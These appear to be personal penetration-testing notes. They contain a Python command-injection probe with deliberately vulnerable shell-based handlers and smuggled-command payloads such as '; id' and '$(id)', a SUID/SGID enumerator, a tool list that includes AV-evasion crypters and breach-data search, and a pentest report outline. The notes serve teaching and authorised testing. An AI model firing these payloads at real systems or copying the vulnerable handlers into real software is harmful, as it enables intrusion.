Notes on pentesting subjects
Enumeration:
- web server directories
- file shares
- CMS
- API endpoints
Exploitation:
- check if API input parameters are injectable, eg. command injection (ls, cat, id) and SQL injection. Use backticks and quotes! (a payload that works unquoted can fail when the input is wrapped in quotes, and vice versa)
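Added example (not from the original notes): two deliberately vulnerable handlers stand in for an API that hands a user-supplied file name to a shell, next to a hardened handler that passes it as an argv element. The probe sends each payload through a handler and looks for the output of id ("uid=") in the response, which only appears if the payload was executed. The handlers, the marker and the payload list are constructed for the example and run locally; against a real target the handler would be replaced by a function that sends the payload to the endpoint and returns the response body.

```python
"""Probing an API parameter for OS command injection (added example)."""
import re
import subprocess

MARKER = "uid="  # output of `id`; only comes back if the payload ran


def _sh(cmd: str) -> str:
    """Run a shell string and return stdout+stderr, like a leaky API would."""
    p = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return p.stdout + p.stderr


def list_dir_unquoted(name: str) -> str:
    """Vulnerable: input concatenated straight into the command line."""
    return _sh("ls " + name)


def list_dir_single_quoted(name: str) -> str:
    """Vulnerable: input wrapped in single quotes (a common half-fix)."""
    return _sh("ls '" + name + "'")


def list_dir_hardened(name: str) -> str:
    """Fixed: allow-list the value and pass it as an argv element, never via a shell."""
    if not re.fullmatch(r"[A-Za-z0-9_.-]{1,64}", name):
        raise ValueError("invalid file name")
    p = subprocess.run(["ls", "--", name], capture_output=True, text=True)
    return p.stdout + p.stderr


# Constructed payloads covering the quoting contexts worth trying:
# bare metacharacters, backticks, $( ), and quote break-outs.
PAYLOADS = [
    "; id",          # command separator, fires when input is unquoted
    "`id`",          # backtick substitution, fires when input is unquoted
    "$(id)",         # POSIX form of the same substitution
    "'; id; '",      # closes a single-quoted context, then runs id
    "\"; id; \"",    # closes a double-quoted context
]


def probe(handler, payloads=PAYLOADS) -> dict:
    """Return {payload: True/False} depending on whether `id` output came back."""
    hits = {}
    for p in payloads:
        try:
            hits[p] = MARKER in handler(p)
        except ValueError:
            hits[p] = False  # rejected before reaching any command
    return hits


def is_injectable(handler) -> bool:
    """True if any payload reached a shell through this handler."""
    return any(probe(handler).values())


if __name__ == "__main__":
    for h in (list_dir_unquoted, list_dir_single_quoted, list_dir_hardened):
        print(f"{h.__name__:24} {probe(h)}")
```

The two vulnerable handlers give opposite results for the backtick and the quote-breakout payloads, which is the point of the note above: one payload per parameter is not enough evidence that a parameter is safe.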
Privesc:
- check suid/sgid binaries (find / -type f -perm -4000 -o -perm -2000 2>/dev/null) and compare against what a stock install ships with
- check unknown binaries (run them under ltrace to see the library calls they make, eg. system() with an unqualified command name)
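Added example (not part of the original notes): a small enumerator for the SUID/SGID check above. It walks a tree, reports every regular file with a set-id bit, and flags the ones whose name is not in a baseline of binaries a stock Linux install normally ships setuid. The BASELINE set is a rough list constructed for the example, not an authoritative one, and make_demo_tree() builds a throwaway directory with constructed sample files so the block runs without scanning the real filesystem.

```python
"""Enumerate SUID/SGID files and flag the unexpected ones (added example)."""
import os
import stat
import tempfile

# Rough, constructed baseline of binaries commonly setuid/setgid on a stock
# Linux install. Anything found with a set-id bit that is not in here
# deserves a closer look (ltrace, strings, file ownership, write access).
BASELINE = {
    "passwd", "sudo", "su", "mount", "umount", "chsh", "chfn", "newgrp",
    "gpasswd", "ping", "fusermount", "pkexec", "ssh-keysign", "wall",
}


def find_suid_sgid(root: str) -> list:
    """Return sorted (path, kind) pairs for regular files under root with a set-id bit.

    kind is 'suid', 'sgid' or 'suid+sgid'. Equivalent to
    find ROOT -type f \\( -perm -4000 -o -perm -2000 \\) 2>/dev/null
    """
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # skip pseudo filesystems when the scan starts at /
        dirnames[:] = [d for d in dirnames if d not in ("proc", "sys", "dev")]
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            bits = []
            if st.st_mode & stat.S_ISUID:
                bits.append("suid")
            if st.st_mode & stat.S_ISGID:
                bits.append("sgid")
            if bits:
                found.append((path, "+".join(bits)))
    return sorted(found)


def unexpected(found: list, baseline=BASELINE) -> list:
    """Keep only entries whose basename is not in the baseline."""
    return [(p, k) for p, k in found if os.path.basename(p) not in baseline]


def summarize(found: list) -> dict:
    """Map basename -> kind, for quick comparison and for the test below."""
    return {os.path.basename(p): k for p, k in found}


def make_demo_tree() -> str:
    """Constructed sample tree: a baseline setuid file, an odd setuid file in
    /opt, a setgid file and a plain file. Returns the temp root."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    spec = {
        "usr/bin/passwd": 0o4755,       # expected
        "opt/backup/runner": 0o4755,    # not in baseline: suspicious
        "usr/bin/wall": 0o2755,         # setgid, expected
        "usr/bin/cat": 0o755,           # no set-id bit
    }
    for rel, mode in spec.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write("#!/bin/sh\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    root = make_demo_tree()
    hits = find_suid_sgid(root)
    for path, kind in hits:
        flag = "" if os.path.basename(path) in BASELINE else "  <-- investigate"
        print(f"{kind:10} {path}{flag}")
    print("unexpected:", summarize(unexpected(hits)))
```

Run it as a script to see the demo output, or call find_suid_sgid("/") from a shell on the target; os.walk silently skips directories it cannot read, which matches the 2>/dev/null in the find one-liner.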
Discover - recon framework (scripts) that wraps the functionality of many other tools, passive and active
Recon-ng - deeper dive for discovery
theHarvester - gathers emails, names, subdomains, IPs and URLs for a domain from public sources
Maltego
hunter.io - emails from a domain
phonebook.cz - domains, email addresses and URLs from a domain
Clearbit Connect - Chrome extension for finding email addresses at a domain
voilanorbert.com - similar to hunter.io
www.builtwith.com - identify all websites using a particular technology
https://tools.emailhippo.com/ - email verification
https://dehashed.com/ - powerful searching of breach data for emails, passwords, usernames, IPs, VIN numbers and more
https://crt.sh/ - certificate based subdomain search, use % as a wildcard e.g %.example.com for all example.com subdomains
OWASP Amass - in-depth network mapping and external asset discovery
Nikto - website scanning
Dirbuster - directory enumeration
Gobuster - enumerate directories, DNS subdomains, S3 buckets, Google Cloud buckets, Virtual Hosts and TFTP servers
WPScan - wordpress site scanner
CMSeek - CMS enumeration
hping3 - packet crafting, port scanning & host discovery
WhatWeb - website scanning
Sublist3r - subdomain enumeration
Mingw32 C compiler - cross-compile Windows executables from Linux
Hyperion - runtime crypter that encrypts a Windows PE to evade signature-based AV
Veil-Evasion - generates payloads built to evade AV
hashcat - GPU password hash cracking
ceWL - builds a custom wordlist by spidering a website
crunch - generates wordlists from character sets and patterns
cupp - common user passwords profiler, builds wordlists from personal details
binwalk - firmware/file analysis and extraction of embedded files
strings - print printable strings in a binary
steghide - hide/extract data in image and audio files
stegsolve - image analysis for steganography (bit planes, colour channels)
apksigner - sign and verify Android APKs
dex2jar - convert Android dex/APK to a jar
JD-GUI - Java decompiler GUI
aws s3 - check S3 bucket access: aws s3 --endpoint-url http://s3.domain.com ls (list buckets) and aws s3 --endpoint-url http://s3.domain.com ls s3://bucket-name (list a bucket); add --no-sign-request to test anonymous access
Executive summary
Describes the goal of the test and offers a high-level overview of the findings.
Background
A description of the purpose of the test and definitions of terms that may be unfamiliar to executives.
Overall posture
An overview of the effectiveness of the test, the issues found and the general issues causing vulnerabilities.
Risk profile
An overall ranking of the organisation's security posture compared to similar organisations, with an explanation of the ranking.
General findings
A general synopsis of the findings along with metrics and statistics of the effectiveness of countermeasures deployed.
Recommendation summary
A high-level overview of the tasks required to remediate the issues discovered in the pentest.
Strategic roadmap
Give the client short- and long-term goals to improve their security posture.
Technical report
This section offers the technical details of the report.
Introduction
An inventory of details such as scope, contacts, etc.
Information gathering
Details of the findings in the information-gathering phase. Of particular interest is the client’s Internet footprint.
Vulnerability assessment
Details of the findings of the vulnerability-analysis phase of the test.
Exploitation/vulnerability verification
Details of the findings from the exploitation phase of the test.
Post exploitation
Details of the findings of the post-exploitation phase of the test.
Risk/exposure
A quantitative description of the risk discovered. This section estimates the loss if the identified vulnerabilities were exploited by an attacker.
Conclusion
A final overview of the test.